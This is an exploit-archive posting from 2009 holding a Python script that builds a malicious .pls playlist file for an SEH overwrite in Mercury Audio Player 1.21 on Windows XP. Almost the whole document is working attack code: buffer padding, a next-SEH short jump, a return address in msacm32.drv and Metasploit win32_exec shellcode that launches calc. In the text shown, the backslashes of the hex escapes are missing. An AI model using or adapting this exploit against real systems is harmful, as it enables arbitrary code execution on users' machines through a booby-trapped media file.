map121-overwrite.txt
Posted on 01 May 2009
#usage: exploit.py print "**************************************************************************" print " Mercury Audio Player 1.21 (.pls) Seh Overwrite Exploit " print " Refer: http://www.milw0rm.com/exploits/8578" print " Exploit code: His0k4" print " Tested on: Windows XP Pro SP3 (EN) " print " greetz: TO ELITE ALGERIANS,snakespc.com " print "**************************************************************************" header1 = ( "x5bx50x6cx61x79x6cx69x73x74x5dx0dx0ax46x69x6cx65" "x31x3d") header2 = ( "x2ex6dx70x33x0dx0ax54x69x74x6cx65x31x3dx20x73x69" "x6cx65x6ex63x65x20x69x73x20x67x6fx6cx64x0dx0ax4e" "x75x6dx62x65x72x4fx66x45x6ex74x72x69x65x73x3dx31" "x0dx0ax56x65x72x73x69x6fx6ex3dx32x0dx0a") buff = "x41" * 31 next_seh = "xEBx06x90x90" seh = "xB8x15xD1x72" #msacm32.drv junk = "x41"*3000 # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com shellcode = ( "x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xe8" "x61xfbx36x83xebxfcxe2xf4x14x89xbfx36xe8x61x70x73" "xd4xeax87x33x90x60x14xbdxa7x79x70x69xc8x60x10x7f" "x63x55x70x37x06x50x3bxafx44xe5x3bx42xefxa0x31x3b" "xe9xa3x10xc2xd3x35xdfx32x9dx84x70x69xccx60x10x50" "x63x6dxb0xbdxb7x7dxfaxddx63x7dx70x37x03xe8xa7x12" "xecxa2xcaxf6x8cxeaxbbx06x6dxa1x83x3ax63x21xf7xbd" "x98x7dx56xbdx80x69x10x3fx63xe1x4bx36xe8x61x70x5e" "xd4x3excaxc0x88x37x72xcex6bxa1x80x66x80x91x71x32" "xb7x09x63xc8x62x6fxacxc9x0fx02x9ax5ax8bx61xfbx36") exploit = header1 + buff + next_seh + seh + shellcode + junk + header2 try: out_file = open("exploit.pls",'w') out_file.write(exploit) out_file.close() raw_input(" Exploit file created! ") except: print "Error"
